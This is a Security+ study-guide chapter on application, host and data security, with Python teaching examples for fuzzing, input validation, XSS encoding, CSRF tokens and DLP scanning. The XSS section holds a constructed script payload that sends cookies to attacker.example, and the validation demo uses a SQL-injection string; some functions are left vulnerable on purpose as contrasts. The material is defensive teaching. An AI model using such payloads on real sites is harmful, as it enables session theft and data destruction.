Application, Host and Data Security
Any attempt to secure computers and networks against security threats should take into account the different vulnerabilities of computer networks and the best methods to mitigate attacks aimed at those vulnerabilities. A network with perfect communications security but no access control is still an extremely vulnerable network. To protect our data and communications, we need to consider how to mitigate and counter application, host, and data security risks.
In this chapter, we will discuss security as it pertains to your applications, data, and host computer systems. It is important to secure networks and physically secure systems, but applications must be patched and hardened, data should be protected through techniques such as encryption, and company computers should be secured so data cannot be compromised, nor sessions hijacked. The core Security+ exam objectives covered in this chapter are as follows:
- Explain the importance of application security
- Carry out appropriate procedures to establish host security
- Explain the importance of data security
Importance of Application Security
Applications can allow computers to perform an immense number of tasks, but they can also open up a host to unwanted exploitation and vulnerability. If an application has access to edit locally stored files, but is vulnerable to unauthorized control, your locally stored files become vulnerable to unauthorized control. In this section, we will be looking at a number of security practices and principles that can enhance the security of applications. This section will cover the following topics:
- Secure coding concepts
- Cross-site scripting (XSS) prevention
- Cross-site request forgery (XSRF) prevention
- Application configuration baseline (proper settings)
- Application hardening
- Application patch management
Fuzzing is the practice of feeding an application a large volume of malformed or unexpected input in the hope that it will sometimes react in a way its developers did not intend. The result may be a simple crash (denial of service), disclosure of data the caller should not see, or, where the fault is a memory-safety or logic error, code execution on the host running the application.
Fuzzing is almost always automated: a fuzzing engine generates or mutates inputs far faster than a tester could by hand, feeds each one to the target, and records how the target responds (crashes, hangs, unexpected errors). Because it needs no access to source code, fuzzing is an effective way for attackers to find input-handling flaws in closed-source applications, and for developers to find them first; it works just as well against open-source code. If an application does not validate and handle every class of input it can receive, fuzzing is one of the quickest ways to discover the resulting vulnerabilities.
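The following Python program, added here as an illustration and not part of the original text, shows the fuzzing loop in miniature. A constructed, deliberately sloppy record parser (the format, a tag byte, a length byte and a payload whose last byte is a checksum, is an assumption made for the example) is fed random mutations of one valid record, and every unexpected exception is recorded with the input that caused it. A hardened version of the same parser, which checks every assumption about its input and fails closed with a controlled ValueError, survives the same run.

```python
import random

def parse_record(data: bytes) -> dict:
    """Constructed fuzz target: a toy length-prefixed record parser.
    Assumed format: 1-byte tag, 1-byte length, payload whose last byte is a
    checksum. It trusts the declared length, which is the bug."""
    tag = data[0]
    length = data[1]
    payload = data[2:2 + length]
    checksum = payload[length - 1]   # IndexError when the input is shorter than declared
    return {"tag": tag, "length": length, "payload": payload, "checksum": checksum}

def parse_record_safe(data: bytes) -> dict:
    """Hardened version: every assumption about the input is checked, and a
    violation fails closed with a controlled ValueError instead of a crash."""
    if len(data) < 2:
        raise ValueError("record too short")
    tag, length = data[0], data[1]
    payload = data[2:2 + length]
    if length == 0 or len(payload) != length:
        raise ValueError("declared length does not match payload")
    return {"tag": tag, "length": length, "payload": payload, "checksum": payload[-1]}

SEED = b"\x01\x05hello"  # constructed valid record: tag 1, length 5, payload "hello"

def mutate(data: bytes, rng: random.Random) -> bytes:
    """Apply one random mutation: bit flip, byte insert, byte delete, or
    overwrite with a boundary value (0x00, 0x01, 0x7F, 0x80, 0xFF)."""
    buf = bytearray(data)
    op = rng.randrange(4)
    if op == 0 and buf:
        buf[rng.randrange(len(buf))] ^= 1 << rng.randrange(8)
    elif op == 1:
        buf.insert(rng.randrange(len(buf) + 1), rng.randrange(256))
    elif op == 2 and buf:
        del buf[rng.randrange(len(buf))]
    elif buf:
        buf[rng.randrange(len(buf))] = rng.choice([0x00, 0x01, 0x7F, 0x80, 0xFF])
    return bytes(buf)

def fuzz(target, seed: bytes, iterations: int = 2000,
         expected=(ValueError,), rng_seed: int = 1) -> dict:
    """Mutation fuzzer. Returns {exception name: first input that triggered it}.
    Exception types listed in `expected` are the target's own controlled
    rejections and are not counted as crashes."""
    rng = random.Random(rng_seed)
    corpus = [seed]
    crashes = {}
    for _ in range(iterations):
        sample = mutate(rng.choice(corpus), rng)
        try:
            target(sample)
        except expected:
            continue
        except Exception as exc:       # anything else is behavior the developer did not intend
            crashes.setdefault(type(exc).__name__, sample)
            continue
        corpus.append(sample)          # accepted inputs become new seeds

    return crashes

if __name__ == "__main__":
    print("naive parser crashes:   ", fuzz(parse_record, SEED))
    print("hardened parser crashes:", fuzz(parse_record_safe, SEED))
```

Running it reports the crashing inputs for the naive parser and none for the hardened one. Production fuzzers such as AFL or libFuzzer add coverage feedback and crash triage, but the loop is the same: mutate, execute, and watch for behavior the developer did not intend.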
Secure Coding Concepts
When it comes to making a securely coded application, it is much more difficult to transform an already written insecure program into a secure one than to program with security in mind from the beginning. Security is not something added on later, but, rather, it is an important consideration at every step in development.
One basic secure coding concept is error and exception handling: ensuring that when a program cannot perform a task, it fails gracefully and securely, that is, it fails closed. Rather than a raw runtime error being displayed to the user, the application should catch the error and display or log information chosen by the developer, not the default message from the OS, framework, or scripting language. Default error output commonly exposes stack traces, file paths, library versions, and database details that help an attacker plan the next step, and an unhandled exception can leave the program in an inconsistent state (for example, with an access check skipped) that an attacker can exploit.
Another basic secure coding concept is input validation: accepting only inputs that match a defined format, length, or range (an allowlist) and rejecting everything else, rather than trying to strip out bad characters. A first name field, for instance, should not accept characters such as semicolons, quotation marks, angle brackets, or equals signs, which limits the scope for injection and scripting attacks. Validation must be done on the server, since anything done in the client can be bypassed. Secure coding concepts help harden applications against attack, a concept discussed later in this section.
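The following Python program, added here as an example and not taken from the original text, puts the two concepts above together. A first-name field is checked against an allowlist pattern (letters, spaces, apostrophes and hyphens, at most 50 characters), and the request handler separates validation failures, which get a specific but harmless message, from unexpected internal errors, which are logged in full with a reference id while the client sees only that id. The business-logic function and the connection-string error it throws are constructed for the example.

```python
import logging
import re
import uuid
from typing import Tuple

log = logging.getLogger("app")

# Allowlist for a first-name field: a letter, then letters, spaces, apostrophes
# or hyphens, 50 characters at most. Digits and symbols such as ; = < > " ( )
# never match, so they are rejected outright rather than "cleaned".
FIRST_NAME = re.compile(r"^[^\W\d_](?:[^\W\d_]|[ '\-]){0,49}$")

class ValidationError(ValueError):
    """Input rejected by the allowlist; its message is safe to show the caller."""

def validate_first_name(value) -> str:
    if not isinstance(value, str):
        raise ValidationError("first name must be text")
    value = value.strip()
    if not FIRST_NAME.fullmatch(value):
        raise ValidationError("first name may only contain letters, spaces, apostrophes and hyphens")
    return value

def save_profile(first_name: str) -> dict:
    """Constructed stand-in for real business logic. The magic value simulates an
    unexpected internal failure whose message leaks infrastructure detail."""
    if first_name == "Crash":
        raise RuntimeError("connection refused: db01.internal:5432 (driver 9.2.1)")
    return {"first_name": first_name}

def handle_request(raw_first_name) -> Tuple[int, dict]:
    """Returns (HTTP status, response body). Validation problems are reported
    specifically; anything unexpected fails closed with a generic message and a
    reference id that ties the client's report to the full server-side log entry."""
    try:
        name = validate_first_name(raw_first_name)
        return 200, save_profile(name)
    except ValidationError as exc:
        return 400, {"error": str(exc)}
    except Exception:
        ref = uuid.uuid4().hex[:8]
        log.exception("unhandled error ref=%s", ref)   # full traceback stays on the server
        return 500, {"error": "internal error", "ref": ref}

if __name__ == "__main__":
    for raw in ["Ada", "O'Brien", "Robert'); DROP TABLE users;--", "<script>alert(1)</script>", "Crash"]:
        print(repr(raw), "->", handle_request(raw))
```

The allowlist is deliberately strict; loosening it for a real user base (other scripts, longer names) is a conscious decision made in one place, which is exactly what validation by rejection buys you.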
Cross-site Scripting (XSS) Prevention
Browsers execute whatever script appears in the pages they load. In a cross-site scripting (XSS) attack, an attacker supplies input (in a comment, a profile field, a URL parameter) that the application inserts into a page without encoding it, so the browser treats the attacker's text as part of the page and runs it with the privileges of the site and the victim's session. Any application that accepts input from a web interface should validate that input and must encode it for the context in which it is output (HTML body, attribute, script, URL), especially when one user's input will be shown to other users. Output encoding is the primary defense; input validation narrows what an attacker can submit in the first place. Together they keep your site from becoming a launch pad for XSS attacks.
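As an added example (not code from the original text), the Python functions below render a user comment and a user-supplied link first unsafely and then with context-appropriate encoding, using the standard library's html.escape. The link renderer also shows why escaping alone is not enough in an href attribute: a javascript: URL contains nothing that escaping would touch, so the scheme is allowlisted as well. The attacker payloads are constructed for the example.

```python
import html
from urllib.parse import urlparse

def render_comment_unsafe(user_input: str) -> str:
    """Vulnerable: user text is concatenated straight into the page, so a stored
    <script> tag runs in every other visitor's browser."""
    return f'<p class="comment">{user_input}</p>'

def render_comment(user_input: str) -> str:
    """Hardened: encode for the HTML element context at the moment of output.
    < > & " ' become entities, so the browser renders them as text."""
    return f'<p class="comment">{html.escape(user_input, quote=True)}</p>'

def render_link(url: str, label: str) -> str:
    """Attribute context. Quote-escaping stops attribute break-outs, but a
    javascript: URL needs no quotes to be dangerous, so the scheme is
    allowlisted; anything else is replaced with a harmless fragment link."""
    if urlparse(url).scheme.lower() not in ("http", "https"):
        url = "#"
    return f'<a href="{html.escape(url, quote=True)}">{html.escape(label)}</a>'

# Constructed attacker payloads of the kind a comment form might receive.
STORED_XSS = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'
ATTR_BREAKOUT = '" onmouseover="alert(document.domain)'

if __name__ == "__main__":
    print(render_comment_unsafe(STORED_XSS))   # script tag reaches the page intact
    print(render_comment(STORED_XSS))          # rendered as visible text instead
    print(render_link("javascript:alert(1)", "click me"))
    print(render_link(ATTR_BREAKOUT, "profile"))
```

In a real application this encoding belongs in the template engine (for example Jinja2 with autoescaping enabled) so that no developer has to remember to call it; hand-escaping is shown here only to make the mechanism visible.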
Cross-site Request Forgery (XSRF) Prevention
In a cross-site request forgery (XSRF, also written CSRF) attack, the attacker does not steal a user's credentials. Instead, a page the attacker controls causes the victim's already authenticated browser to send a request (a form post, an image request, a link) to the target site. Because the browser attaches the session cookie automatically, the site carries out the action as the victim: changing an e-mail address, transferring funds, creating an account. Encrypting the login or expiring sessions regularly does not stop this, since the forged request rides a valid session. The defense is to require something the attacker's page cannot obtain: a secret anti-forgery token tied to the session, embedded in the site's own forms and checked on every state-changing request, together with marking session cookies SameSite and never allowing a GET request to change state.
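The following Python program is an added example, not part of the original text. It models a state-changing endpoint (a funds transfer, constructed for the example) that issues a per-session anti-forgery token derived with an HMAC over the session id and verifies it in constant time. The demo runs a legitimate form post, a forged cross-site post that carries the victim's cookie but no token, and a post carrying a token issued for a different session. The server secret is assumed to be a per-deployment value that never leaves the server.

```python
import hashlib
import hmac
import secrets
from typing import Optional, Tuple

# Assumption for this example: one random secret per deployment, held server-side only.
SERVER_SECRET = secrets.token_bytes(32)

def issue_csrf_token(session_id: str) -> str:
    """Token bound to the session with an HMAC. The site embeds it in its own
    forms; a page on attacker.example cannot read it because of the same-origin
    policy, and cannot forge it without SERVER_SECRET."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def verify_csrf(session_id: str, submitted: Optional[str]) -> bool:
    if not submitted:
        return False
    # Constant-time comparison so the token cannot be guessed byte by byte.
    return hmac.compare_digest(issue_csrf_token(session_id), submitted)

def handle_transfer(request: dict, sessions: dict) -> Tuple[int, str]:
    """Constructed state-changing endpoint. `request` models what the server
    sees: the method, the cookies the browser attached automatically, and the
    submitted form fields."""
    sid = request["cookies"].get("session")
    if sid not in sessions:
        return 401, "not logged in"
    if request["method"] != "POST":
        return 405, "state changes must use POST"        # GET must never change state
    if not verify_csrf(sid, request["form"].get("csrf_token")):
        return 403, "missing or invalid CSRF token"
    sessions[sid]["balance"] -= int(request["form"]["amount"])
    return 200, "transfer ok"

def demo() -> dict:
    """Legitimate post, forged cross-site post riding the same cookie, and a
    post that reuses a token issued for another session."""
    sessions = {"s1": {"user": "alice", "balance": 100}}
    cookie = {"session": "s1"}                            # attached by the browser on every request
    legit = {"method": "POST", "cookies": cookie,
             "form": {"amount": "10", "csrf_token": issue_csrf_token("s1")}}
    forged = {"method": "POST", "cookies": cookie, "form": {"amount": "90"}}
    other = {"method": "POST", "cookies": cookie,
             "form": {"amount": "90", "csrf_token": issue_csrf_token("s2")}}
    return {
        "legit": handle_transfer(legit, sessions),
        "forged": handle_transfer(forged, sessions),
        "other_session_token": handle_transfer(other, sessions),
        "balance": sessions["s1"]["balance"],
    }

if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Web frameworks ship this as middleware (Django's CsrfViewMiddleware, for example); the point of writing it out is to see that the check depends on a value the attacker's origin can neither read nor compute, not on the strength of the login.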
Application Configuration Baseline (Proper Settings)
To ensure basic application security, your organization must set a basic standard for the use of applications, or an application configuration baseline. Does your organization require the use of a certain browser, or the use of a certain version of that browser? Do macros and scripting need to be disabled, or is the tradeoff in usability versus security not worth it? The application baseline is the established minimum for applications in your environment. Every host in your environment should meet this baseline.
Application Hardening
Application hardening is the process of making an application more resistant to attack. It includes code review, applying the security baseline, and locking down configuration settings. A hardened application follows a number of principles and practices: changing default usernames and passwords, running with the least privileges it needs to function, and limiting its attack surface by disabling or removing components, features, and sample content it does not need. Changing default credentials deserves particular attention, for applications such as database servers as much as for appliances such as routers, because default usernames and passwords are published on the Internet and are the first thing an attacker tries.
Any and all changes made to an application to make the application more difficult to attack are examples of application hardening, whether those changes are made in the design and development of an application or made to the configuration of an already deployed application.
Application Patch Management
Once a security baseline has been established, it will need to be constantly revised to take into account new application versions, which may add new features or fixes for security vulnerabilities. Many applications can be upgraded on an individual basis, but for large environments, it may not be practical for updates to be made on a computer-by-computer basis.
When new application patches or versions are released, an administrator should determine whether the update would help or hinder normal operations, and update the applications and the application baseline if necessary. Not every new version increases security or has features worth upgrading to. A feature release can be rolled out only to the hosts that need it or, if the application baseline is updated to require it, to all hosts; a release that fixes a security vulnerability should normally go to every host that runs the application, after testing.
Appropriate Procedures to Establish Host Security
Application security can help to close some of the doors that might provide access to a system. Unfortunately, those applications, however secure, have to run on a host that may also be vulnerable to attack. Fortunately, there are a number of steps that may be taken to increase the security of the hosts the applications rely on. This section will cover the following topics:
- Operating system security and settings
- Patch management
- Hardware security
- Host software baselining
- Mobile devices
Operating System Security and Settings
One of the most basic steps to take to improve the security of a host is to configure it according to common security principles, such as least access permissions, minimum attack surface, and a patch level that protects the system against known threats.
User accounts on any system should be granted the permissions necessary to perform their authorized tasks, and no more. The operating system should have only the features, services, and protocols that are actually in use enabled, and no more; every unnecessary service is additional attack surface. The system should be updated regularly so that known vulnerabilities no longer pose a threat to it.
Though often conflated, anti-virus and anti-malware are not identical. Anti-virus, in the traditional sense, detects and removes viruses, worms, and Trojans, largely by signature. Anti-malware covers a broader range of threats to the host; it may, for instance, block phishing or pharming attempts, adware, and spyware in addition to the malicious code that traditional anti-virus software handles. In practice, most current products are suites that combine the two.
A host-based intrusion prevention system (HIPS) is closely related and is often bundled with anti-malware. Rather than only scanning files against known signatures, a HIPS watches what is happening on the host (process behavior, changes to system files and configuration, network connections) and blocks actions that violate its rules or match known attack patterns. One of the most effective ways to raise the security level of any host is to disable unneeded services and ensure the host is running a HIPS or anti-malware with current signatures or definitions.
Some classes of anti-malware specialize in defeating a specific type of threat, rather than protecting a host from general classes of threats.
Anti-virus software is concerned with detecting and preventing damage from Trojans, worms, and viruses.
Anti-spam software attempts to determine whether e-mail is from a legitimate source or is unsolicited commercial bulk e-mail. E-mail determined to be legitimate is presented to the user, while suspect or illegitimate e-mail is removed from the user’s sight.
Some applications may expose personal details, from browsing history to passwords entered into a PC, to an unauthorized third party. Anti-spyware is concerned with preventing applications from gathering personal data from a host.
Pop-up blockers and anti-adware programs strive to eliminate the relatively safe yet annoying programs that can load pop-ups or additional advertisements on a user’s computer.
The host-based firewall takes a different approach to controlling malware. Rather than trying to recognize malicious code as it runs, it constrains what any program, rogue or not, can do on the network: it blocks unsolicited inbound connections to the host and, where outbound filtering is enabled, denies programs network access unless the firewall's administrator has granted it. The safe default is to block every communication that has not been explicitly permitted. A host firewall does not replace anti-malware, since a rogue program that is granted or hijacks a permitted path still gets out, but it shrinks both the services the host exposes and a rogue program's room to move.
Patch Management
Just as with application patching, operating system patching protects your systems against vulnerabilities as they are identified. Applying current patches is the single most efficient way to protect an operating system against known vulnerabilities; many successful attacks exploit flaws for which a patch was already available.
To ensure patches do not interfere with the expected operation of a system, it is recommended to install patches on a non-critical test machine before deploying them on all hosts in an organization.
Hardware Security
While we often think of computer security as something that happens in the digital realm, there are also physical steps that protect your systems; an attacker who can pick up a device or open a rack can usually bypass every software control on it.
A cable lock for a computer works just like a cable lock for a bicycle. A cable lock attaches an otherwise mobile asset to a far less mobile object. This keeps anyone from walking away with the locked equipment. As with any cable lock, a computer cable lock is a deterrent, but given sufficient time or preparation, it may be defeated.
Sensitive data or equipment that must be kept in place without risk of loss is often stored in a safe. Many safes, in addition to preventing access to their contents, will protect against environmental damage, such as from water or fire. A safe is a great choice for physically securing smaller items, such as backup media, or valuable small hardware, such as laptops.
For securing larger equipment or a greater quantity of equipment, an administrator might employ locking cabinets or racks. The great benefit of locking racks is that the physical security of the cabinet contents can be assured while still allowing the equipment to remain in use. Even in a shared environment, such as a co-located data center, locking cabinets can effectively control physical access to your hardware.
Host Software Baselining
Basic host security should be set at an enterprise level. Whenever a new host is brought into the network, care should be taken to ensure that the OS and applications meet the established software baseline. A successful attack on the OS of a system can grant access to any data the host has access to, and a successful exploit of an application can grant an attacker access to any data that passes through the application. Best practices need to be followed on each host to bring the software in line with the enterprise security baseline, avoiding a weak link that can be exploited.
Mobile Devices
Ensuring the physical security of mobile devices such as smartphones is rarely practical. Because the hardware is an attractive target for thieves and is easily misplaced, the primary concern with mobile devices is usually the security of the information on the device.
There are a number of methods that may be employed to make it more difficult for an attacker to get access to the private contents of a device in their possession.
Simply requiring a password to activate a device presents a hurdle that a casual attacker will find difficult to overcome. Requiring even a simple password to unlock the screen of a device that has not been used for a short period of time adds a fundamental level of security.
Most mobile devices will support a stronger password than a simple number code. If a password is simple, it may be easy to deduce from shoulder surfing or examining the smudges left on a smart phone screen. A complex or strong password makes these types of attacks less likely.
Even if an attacker cannot unlock a device, they may still be able to read the data stored on it, by removing the storage or booting from other media, especially on a laptop or other commodity hardware. To prevent this, most devices support encryption of all data stored on the device. Properly implemented, this means an attacker with physical access can read only ciphertext. The protection is only as strong as the passcode or key that unlocks it, so device encryption should be paired with a strong unlock code and, where the hardware supports it, keys held in a tamper-resistant chip.
When a device is lost or stolen, some risk remains that the data will eventually be recovered, whether through a weak passcode, a flaw in the device's implementation, or simply the attacker having unlimited time. The most definitive protection for the data on a lost device is to remove it remotely. Many devices support a "remote wipe" command, delivered when the device next contacts the network, that erases all personal data; on an encrypted device this can be done almost instantly by destroying the encryption key.
Data encryption and remote wipe complement each other: encryption protects your data while the device is out of communication range, and remote wipe removes it permanently once the device reconnects. Used together, they are the strongest protection for data on a mobile device.
You may also want to prevent eavesdroppers from monitoring communications made over a mobile device, especially a phone used for sensitive conversations. Standard cellular calls are encrypted only between the handset and the carrier's network, not end to end, so the carrier, and anyone able to intercept or impersonate its equipment, can listen in. Some phones and applications can encrypt voice end to end, on the fly. Historically this required specialized hardware and considerably more processing power than an ordinary call; even allowing for those drawbacks, for the most sensitive conversations voice encryption is a worthwhile option.
Many mobile devices have built-in GPS, so the device knows where it is, which is a great help when locating a lost device. The drawback is that the same data can be used by an attacker, or by any application granted access to it, to track the carrier of the device. Location services can usually be disabled, or restricted to specific applications, limiting some functionality of the phone but protecting against unauthorized access to the location data.
Virtualization
Virtualization brings real gains in hardware efficiency, but it also brings a new set of risks that should be considered. Virtual machines on a single physical host communicate with each other through a virtual switch inside that host, for instance, so their traffic never touches the physical network; a network monitor or intrusion detection sensor on the physical segment will not see it unless the virtual switch mirrors the traffic to it or a monitoring appliance runs inside the virtual environment.
Virtual hosts have the same security requirements as physical hosts do. Installing a host-based firewall and an anti-virus app on one virtual machine will not protect the other virtual machines on the same piece of hardware. Any host-level security steps must be repeated for each virtual host in your environment.
The lower the layer an attack targets in a system, the greater the control it grants the attacker. Just as an attack on an application grants access to whatever the application can reach, an attack on the OS grants access to whatever the OS can reach, including every application. On a virtual host, all of the guest operating systems and their applications sit on top of an even lower layer, the virtual machine manager, or hypervisor. A successful attack on the hypervisor or on the physical host beneath it can therefore grant an attacker control over every virtual machine it runs, which is why the hypervisor and its management interfaces must be patched and locked down at least as carefully as the guests.
Importance of Data Security
In an enterprise environment, few things are more important to your company than its data. A central question in keeping data safe is whether others, namely attackers and other people with malicious intent, can access it. Data loss prevention and encryption, the two major topics of this section, are the controls that let you answer that question with confidence. This section will cover the following topics:
- Data Loss Prevention (DLP)
- Data encryption
- Hardware-based encryption devices
- Cloud computing
Data Loss Prevention
Data Loss Prevention (DLP) is an important part of an organization's security program. There are three types of DLP: Endpoint, Storage, and Network. Endpoint DLP protects data while it is in use on the client computer; Storage DLP protects data while it resides on servers; and Network DLP protects data in transit over the network, inspecting it as it leaves. All three guard against data loss or inappropriate transmission, such as e-mailing confidential files, copying data to USB drives, employees bringing in and using personal music devices as removable storage, or shared folders with incorrect permissions assigned to them.
Installing DLP controls on all computers, along with proper policy and acceptable use training, is one of the best ways to ensure data is safe and not leaked or lost.
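The following Python program, an added example rather than anything from the original text, shows the content inspection at the core of a network or endpoint DLP control. Candidate payment card numbers and US-style Social Security numbers are found with patterns, card candidates are confirmed with the Luhn check digit so that order numbers and phone extensions are not flagged, and an outbound message is blocked if anything is found in its body or attachments; a redaction helper produces what should go into the incident log. The sample messages are constructed for the example (the card number is the widely published Visa test number 4111 1111 1111 1111).

```python
import re
from typing import List, Tuple

# Cheap candidate filters: 13 to 19 digits optionally separated by spaces or
# hyphens, and US-SSN-shaped 3-2-4 digit groups. The Luhn check below is what
# keeps the card pattern from flagging every long number it sees.
CARD_RE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")
SSN_RE = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")

def luhn_ok(digits: str) -> bool:
    """Payment card check digit (ISO/IEC 7812). Arbitrary numbers pass it
    only one time in ten, which removes most false positives."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

def _digits(s: str) -> str:
    return re.sub(r"\D", "", s)

def find_sensitive(text: str) -> List[Tuple[str, str]]:
    """Return (kind, matched text) for every confirmed finding in `text`."""
    findings = []
    for m in CARD_RE.finditer(text):
        if luhn_ok(_digits(m.group())):
            findings.append(("card", m.group()))
    for m in SSN_RE.finditer(text):
        findings.append(("ssn", m.group()))
    return findings

def redact(text: str) -> str:
    """What goes into the DLP incident log: everything but the last four digits masked."""
    def mask(m):
        d = _digits(m.group())
        return "*" * (len(d) - 4) + d[-4:]
    text = CARD_RE.sub(lambda m: mask(m) if luhn_ok(_digits(m.group())) else m.group(), text)
    return SSN_RE.sub(mask, text)

def inspect_message(body: str, attachments: Tuple[str, ...] = ()) -> Tuple[bool, List[Tuple[str, str]]]:
    """Network-DLP style decision for one outbound e-mail: (block?, findings).
    Attachments are passed as already-extracted text."""
    findings = find_sensitive(body)
    for text in attachments:
        findings.extend(find_sensitive(text))
    return bool(findings), findings

# Constructed sample traffic.
SAMPLES = [
    ("Lunch Friday? Order ref 1234567890123456, call ext 4321.", ()),
    ("Customer card 4111 1111 1111 1111 exp 12/29, please refund.", ()),
    ("HR onboarding attached.", ("Name: J. Doe  SSN: 123-45-6789",)),
]

if __name__ == "__main__":
    for body, attachments in SAMPLES:
        blocked, findings = inspect_message(body, attachments)
        print("BLOCK" if blocked else "allow", findings, "|", redact(body))
```

The first sample contains a 16-digit order number that fails the Luhn check and is allowed through; the second is blocked on the card number in the body, the third on the SSN in the attachment. Real DLP products add document fingerprinting, keyword dictionaries and policy per channel, but every one of them starts with this kind of pattern-plus-validator matching.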
Lastly, when hard drives are replaced, the old drives should be sanitized before they leave your control. For magnetic drives, overwriting the entire drive destroys the data; under current NIST SP 800-88 guidance a single complete pass, verified, is sufficient, and the old advice to overwrite many times dates from much older drive technology. Overwriting is not reliable for solid-state drives, whose controllers remap blocks behind the operating system's back; use the drive's built-in secure erase or cryptographic erase instead, or physically destroy drives that held the most sensitive data.
Data Encryption
A major component of data security today is data encryption. Simply put, encryption transforms data so that it is readable only by someone holding the key that reverses the transformation. Encryption comes in many forms and strengths; we will discuss a few here.
Full disk encryption, or full-volume encryption, is a popular protection for workstations and laptops that hold sensitive data, since it protects everything on the volume without relying on users to decide what to encrypt. The encryption itself is done by software in the operating system or by a self-encrypting drive; a Trusted Platform Module, or TPM (covered later), is commonly used to protect the volume key and release it only when the machine boots in a known-good state.
Much important company data is contained in databases. Keep them protected by making sure they are not reachable from the Internet at all: block the database ports at the corporate firewall (1433 for Microsoft SQL Server, for example) and restrict access on the internal network to the application servers that actually need it. Also consider encrypting your backups, since backup media can be compromised in transit to the backup location or while stored there.
Individual files can be encrypted as well. A popular method on Windows systems is EFS, the Encrypting File System, a feature of NTFS that can encrypt both files and folders. EFS uses two kinds of keys to get both speed and strength: each file is encrypted with a fast symmetric key, and that key is in turn encrypted with the user's public key, so only the holder of the matching private key (or a designated recovery agent) can open the file. Note that EFS protects data only while it sits on NTFS; a file copied to a FAT-formatted USB drive or sent by e-mail leaves in the clear.
Hardware-based Encryption Devices
A simple fact of computing is that all data ends up stored on a disk somewhere. A good way to protect that data is with hardware-based encryption devices, which perform the cryptography in dedicated hardware rather than in software running on the general-purpose CPU. This brings two crucial benefits:
- Encryption is faster, because it does not compete with the operating system and applications for CPU time
- Data tends to be more secure, because keys are generated and held inside the device and never have to be exposed in system memory, where malware or a memory dump could capture them
The two main devices that perform hardware-based key protection are the Trusted Platform Module (TPM) and the Hardware Security Module (HSM). The TPM is a chip built into the motherboard. It holds keys that never leave it, including a unique RSA endorsement key installed at manufacture and keys it generates for the platform, and a set of registers that record measurements of the firmware and boot components as the machine starts. This lets it detect alterations to the boot configuration and refuse to release a disk encryption key until the user supplies a recovery key. The TPM's two major tasks are therefore key protection, generating and storing keys and "sealing" them so they are usable only on that machine in a trusted state, and boot integrity, ensuring the computer has not been tampered with before the operating system volume is unlocked. The TPM does not perform the bulk encryption of the disk itself; that is done by the CPU or by the drive, with the TPM guarding the key.
HSMs are dedicated encryption devices, typically PCIe cards or network-attached appliances, that generate, store, and manage cryptographic keys and perform signing and decryption inside tamper-resistant hardware, so private keys never leave the device. HSMs are the strongest option for managing the keys and digital certificates of a certificate authority or other high-value system.
Another method of hardware-based encryption is encryption of removable storage devices, such as USB drives. This assists in keeping data saved to a portable drive secure in case it is lost.
Cloud Computing
When systems rely on cloud computing, it is imperative to ensure tight security of the data those systems use. Because the physical location of data in a cloud service is not always known or fixed, you should at the very least require strong security controls in the cloud: encryption of data at rest and in transit, and access controls that you manage. Unfortunately, many DLP controls were designed before cloud computing existed and assume the data sits on your own servers and network, so they may not fit your organization's needs.
Data Loss Prevention (or Data Leakage Prevention) products address only confidentiality in the CIA triad, not integrity or availability. Moreover, if your data is stored in a third-party cloud rather than on your own systems, storage and network DLP lose much of their visibility, since the data does not reside on your servers or cross your network perimeter. You must then rely on endpoint DLP to protect data as it is being used, and on whatever controls the cloud provider exposes.